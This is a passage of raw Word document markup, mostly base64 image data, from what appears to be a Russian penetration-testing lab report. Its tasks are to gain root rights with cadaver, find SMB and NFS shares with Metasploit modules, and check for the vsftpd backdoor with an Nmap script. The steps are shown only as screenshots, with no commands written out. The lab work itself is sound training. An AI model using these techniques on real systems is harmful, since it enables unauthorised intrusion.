0;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&#10;liY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5" o:spid="_x0000_s1030" type="#_x0000_t75" style="position:absolute;left:1524;top:1524;width:59436;height:37719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SbE7DAAAA2gAAAA8AAABkcnMvZG93bnJldi54bWxEj91qAjEUhO8LfYdwCr3TbBeqZTVKkRba&#10;G63WBzhujpvFzcm6yf69vREKvRxm5htmuR5sJTpqfOlYwcs0AUGcO11yoeD4+zl5A+EDssbKMSkY&#10;ycN69fiwxEy7nvfUHUIhIoR9hgpMCHUmpc8NWfRTVxNH7+waiyHKppC6wT7CbSXTJJlJiyXHBYM1&#10;bQzll0NrFRR03X3o71PfDqnR25/5OJOXUqnnp+F9ASLQEP7Df+0vreAV7lfiDZCr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ZJsTsMAAADaAAAADwAAAAAAAAAAAAAAAACf&#10;AgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9wAAAI8DAAAAAA==&#10;">
                  <v:imagedata r:id="rId61" o:title=""/>
                </v:shape>
                <v:rect id="Прямоугольник 1" o:spid="_x0000_s1031" style="position:absolute;left:4313;top:28232;width:27939;height:16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pLM74A&#10;AADaAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+L/gfwgje1sQeZKlGqYKweyo+ds9DM7bF&#10;ZlKa2NZ/b4QFT8PH95z1drSN6KnztWMNi7kCQVw4U3Op4XI+fH6B8AHZYOOYNDzIw3Yz+VhjatzA&#10;R+pPoRQxhH2KGqoQ2lRKX1Rk0c9dSxy5q+sshgi7UpoOhxhuG5kotZQWa44NFba0r6i4ne5WQ5L/&#10;UrnLfuzSySJT7q9X+TnXejYdsxWIQGN4i//d3ybOh9crrys3T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GaSzO+AAAA2gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3ducmV2&#10;LnhtbFBLBQYAAAAABAAEAPUAAACDAwAAAAA=&#10;" filled="f" strokecolor="red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01AC4" w:rsidRDefault="00401AC4" w:rsidP="00EF49C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10. При помощи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cadaver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, получить </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-права.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="005B2EC9" w:rsidRDefault="00EF49CB" w:rsidP="005B2E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1435F81" wp14:editId="00B396F5">
            <wp:extent cx="5940115" cy="2120900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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b w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc107507609"/>
      <w:bookmarkStart w:id="18" w:name="_Toc107513728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3.3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Специализированные сканеры</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/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получить практику использования специализированных сканеров. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:ind w:firstLine="708"/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Задание: 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найти SMB-папки с общим доступом на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 с помощью соответствующего модуля в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit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Framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">; 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найти NFS-папки с общим доступом на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 с помощью соответствующего модуля в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit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Framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">; 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проверить наличие </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>бэкдора</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> со специализированным скриптом для NMAP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:ind w:firstLine="708"/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1411FD" w:rsidRDefault="001411FD" w:rsidP="00EF49CB">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Шаг 1. Поиск SMB-папок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US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5632EF0" wp14:editId="390C7964">
            <wp:extent cx="5539740" cy="2680978"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="350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 rotWithShape="1">
                    <a:blip r:embed="rId63"/>
                    <a:srcRect b="3678"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5543599" cy="268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1411FD" w:rsidRDefault="001411FD" w:rsidP="00EF49CB">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Шаг 2. Поиск NFS-папок.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36D51D6" wp14:editId="13E93F42">
            <wp:extent cx="4291257" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29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 rotWithShape="1">
                    <a:blip r:embed="rId64"/>
                    <a:srcRect b="6137"/>
                    <a:stretch/>
                  </pic:blipFill>
